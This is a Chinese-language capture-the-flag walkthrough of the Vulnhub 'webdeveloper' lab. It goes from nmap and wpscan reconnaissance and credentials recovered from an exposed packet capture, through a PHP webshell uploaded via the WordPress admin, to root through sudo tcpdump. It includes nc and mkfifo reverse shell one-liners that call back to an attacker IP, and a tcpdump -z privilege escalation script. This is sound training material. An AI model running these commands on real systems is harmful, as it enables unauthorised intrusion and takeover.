Vulnhub webdeveloper靶機滲透

信息蒐集

nmap -sP 192.168.146.0/24 #主機發現
nmap -A 192.168.146.148 #綜合掃描

訪問一下發現是wordpress，wp直接上wpscan
wpscan --url http://192.168.146.148/ -e u #爆用戶名

wpscan --url http://192.168.146.148/ -e cb,dbe #掃配置文件，數據庫文件

沒有什麼發現

dirb http://192.168.146.148/ #dirb掃目錄
基本都是常規的wp目錄，可是看到ipdata目錄很可疑。

看到一個流量包，下載下來分析。

http.request.method ==POST #只看post方法，寄但願於找用戶密碼

確實有login頁面，且記錄了用戶名和密碼。 webdeveloper -- Te5eQg&4sBS!Yr$)wf%(DcAd

getFlag

wp後臺反彈shell

登錄進就是wp常規的後臺拿shell了：上傳插件

大概總結下wp後臺getshell方法：
1.上傳插件;  直接上傳php文件，路徑/wp-content/uploads/year/month/xx.php
2.主題外觀編輯php文件寫代碼;   路徑/wp-content/themes/主題名/修改文件的文件名
3.和主題一塊兒打包php成zip文件，上傳主題安裝;
4.媒體處Browser上傳文件。
5.編輯已安裝插件。

提示出錯不要緊,直接訪問http://192.168.146.148/wp-content/uploads/2020/03/normal.php
2020/03改爲本身的日期，文件名也是本身的，能夠發現上傳是成功的，直接蟻劍連上。

而後反彈shell。 滲透機 nc -lvp 4444

靶機nc -e /bin/sh 192.168.146.132 4444 #發現沒有-e選項
使用下面這個。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.146.132 4444 >/tmp/f
解釋：mkfifo 命令首先建立了一個管道，cat 將管道里面的內容輸出傳遞給/bin/sh，sh會執行管道里的命令並將標準輸出和標準錯誤輸出結果經過nc 傳到該管道，由此造成了一個迴路。
參考：https://xz.aliyun.com/t/2549#toc-4

常規的，看一眼sudo -l和suid文件，沒有什麼發現。

查看配置文件

看一眼wp的配置文件，看看能不能找到數據庫密碼，而後進行mysql提權(udf,mof)什麼的。

username=webdeveloper password=MasterOfTheUniverse
emmmm... 蟻劍沒法連上數據庫。 看來應該是隻能登錄webdeveloper用戶，而後再進行數據庫操做了。
鑑於不少人喜歡將密碼設置成同樣的，咱們這裏能夠嘗試ssh連接。

提權

看到目錄下提示了sudo成爲admin，那就sudo -l看看sudo權限。

看看tcpdump的命令幫助。

關注-z和-Z參數，前者執行腳本，後者指定運行用戶

# 使用方法
webdeveloper@webdeveloper:/tmp$ echo 'mknod backpipe p && nc 192.168.146.132 4444 0<backpipe | /bin/bash 1>backpipe' > priv.sh
webdeveloper@webdeveloper:/tmp$ chmod +x priv.sh        #必定要加權限啊，坑了我很久
webdeveloper@webdeveloper:/tmp$ sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/priv.sh -Z root
# 解釋:-W 1抓一個包，-G 1運行1s，由於咱們只要運行下tcpdump而後執行shell腳本就好了

既然均可以執行shell了，直接寫sudoers等文件提權也ok

總結

靶機不難，主要複習了下wp後臺getshell，方法不少了。 實操了下tcpdump提權，其餘也就沒什麼了。